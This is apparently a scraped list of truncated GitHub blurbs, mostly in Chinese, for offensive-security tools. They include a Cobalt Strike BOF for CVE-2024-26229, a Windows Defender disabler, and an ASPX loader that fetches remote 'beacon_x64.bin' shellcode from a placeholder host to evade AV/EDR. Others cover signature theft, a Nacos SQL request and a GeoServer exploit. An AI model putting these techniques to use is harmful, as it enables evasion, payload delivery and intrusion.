wscanWscan是一款专注于WEB安全的扫描器，它向Nmap致敬，而Nmap已经开源25年了。我们也计划在未来25年内持续更新Wscan，并将其持续开源。我们欢迎所有对web安全感兴趣的人一起加入我们的开发团队。我们的目标是开发一款使用机器学习进行渗透测试的工具。与其他工具不同的是，我们的工具可以自动学习攻击和防御的模式，并根据具体的目标进行个性化的攻击。这样一来，我们的攻击效率和准确性将大大…

CVE-2024-26229BeaconObjectFilesBeaconObjectFile(BOF)implementationsfromNVISOofCVE-2024-26229forCobaltStrikeandBruteRatel.Compilewith:gcc-cCVE-2024-26229-bof.c-oCVE-2024-26229-bof.oThisvulnerabilitywas…

estNet资产管理系统旨在提供全面、高效的互联网资产管理与监控服务，构建详细的资产信息库。该系统能够帮助企业安全团队或渗透测试人员对目标资产进行深入侦察和分析，提供攻击者视角的持续风险监测，协助用户实时掌握资产动态，识别并修复安全漏洞，从而有效收敛攻击面，提升整体安全防护能力。###目前功能[X]项目管理[X]资产管理（公司、域名、子域名、IP、端口、Web、API、漏洞、资产标签、黑名单等）[…

前提這是由https://gitee.com/liyouyinjia/ctftools-all-in-one轉發至Github過來，目的讓牆內外的都能夠下載到本程式。方案归@liyouyinjia及参与贡献者拥有。介绍随着网络安全领域的不断发展，网络安全竞赛（CaptureTheFlag，简称CTF）已经成为衡量网络安全人才技能水平的重要平台。CTF竞赛不仅要求参赛者具备深厚的网络安全理论知识，还…

温馨提示：该工具运行时不会对目标IP主动扫描，但是会调用第三方接口，所以会存在对互联网发送大量HTTP请求情况，如果网络环境比较特殊的场景下请勿使用该工具，避免引起不必要的麻烦。免责声明：此工具仅限于学习交流，请在下载后24小时内删除，请勿非法使用该工具，用户承担因使用此工具而导致的所有法律和相关责任！作者不承担任何法律责任！一、工具背景背景：在攻防演练期间，对于重保值守人员，某些客户要求对攻击I…

no-defenderre-upno-defenderAslightlymorefunwaytodisablewindowsdefender.HowitworksThere'saWSC(WindowsSecurityCenter)serviceinWindowswhichisusedbyantivirusestoletWindowsknowthatthere'ssomeotherantivirus…

说明ASPX内存执行shellcode,绕过WindowsDefender（AV/EDR），这只是个代码例子，目的是为了学习部分杀软（AV/EDR）可能需要你的Bin能够做到内存免杀持续更新中，包括后续的JSP内存加载使用将shellcode远程托管到任意网站（URLB）http://URLA/bypass.aspx?shellcodeURL=http://URLB/beacon_x64.bin视…

一键窃取签名程序的图标、资源信息，版本信息、修改时间、数字签名（无效），使程序正规化。对抗QVM数字签名是无效的，但是可以起到模拟的作用可以生成程序的图标存根 Thief.mp4 参考https://github.com/sorabug/ChangeTimestamphttps://github.com/secretsquirrel/SigThief

部署函数id问题没办法存一下吧✅(被部署太多不容易打，可参考6)本地加载✅关闭时要结束进程✅内存马太大怎么办？命令写内存jar？精简？❎换蚁剑✅判断系统人工选择路径✅擦屁股/爆菊查询存在的函数S_EXAMPLE_xxxx基本上用公开的poc都没改过包括本工具GET/nacos/v1/cs/ops/derby?sql=select%20%2A%20from%20%28SELECT%20%2A%20F…

geoserverCVE-2024-36401声明：仅用于授权测试，用户滥用造成的一切后果和作者无关请遵守法律法规！工具稍后放出原本没打算写的，主要是想着直接去搜一下工具，直接用着方便就OK了找到一个geoserverCVE-2024-36401漏洞利用工具GeoServer综合漏洞扫描工具V1.2发布！但是实际使用下来感觉到这个工具稍微有点Lk，作者说是go语言写的，速度极快，主要表现是两点1、…